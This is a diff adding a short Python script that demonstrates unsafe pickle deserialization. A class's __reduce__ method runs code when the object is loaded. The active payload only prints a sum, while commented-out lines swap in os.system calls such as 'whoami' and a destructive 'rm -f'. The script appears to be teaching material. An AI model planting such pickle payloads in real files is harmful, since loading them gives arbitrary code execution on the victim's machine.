Upload test-badmoh-pick.py
Browse files- test-badmoh-pick.py +31 -0
test-badmoh-pick.py
ADDED
|
@@ -0,0 +1,31 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
############################################
|
| 2 |
+
#example of unsafe de-serialization
|
| 3 |
+
import pickle
|
| 4 |
+
import os
|
| 5 |
+
|
| 6 |
+
#1. creating a Evil class which has our malicious payload command (‘whoami’)
|
| 7 |
+
class EvilPickle(object):
|
| 8 |
+
#def __reduce__(self):
|
| 9 |
+
#exec('print("Hello Exec")')
|
| 10 |
+
#return os.system, ('ls',)
|
| 11 |
+
#return (os.system, ('whoami', ))
|
| 12 |
+
|
| 13 |
+
def __reduce__(self):
|
| 14 |
+
#cmd = ('rm -f h://IDrive/pickle-tests/ex1/test.txt')
|
| 15 |
+
#cmd = ('ls -al')
|
| 16 |
+
#cmd = (eval('print("Hello Exec")'))
|
| 17 |
+
#return os.system, (cmd,)
|
| 18 |
+
return exec, ('a = 7\nb = 10\nprint("Sum = ", a + b)', )
|
| 19 |
+
|
| 20 |
+
#2. serializing the malicious class
|
| 21 |
+
pickle_data = pickle.dumps(EvilPickle())
|
| 22 |
+
#storing the serialized output into a file in current directory
|
| 23 |
+
with open("backup.data", "wb") as file:
|
| 24 |
+
file.write(pickle_data)
|
| 25 |
+
|
| 26 |
+
#3. reading the malicious serialized data and de-serializing it
|
| 27 |
+
with open("backup.data", "rb") as file:
|
| 28 |
+
pickle_data = file.read()
|
| 29 |
+
my_data = pickle.loads(pickle_data)
|
| 30 |
+
|
| 31 |
+
###########################################
|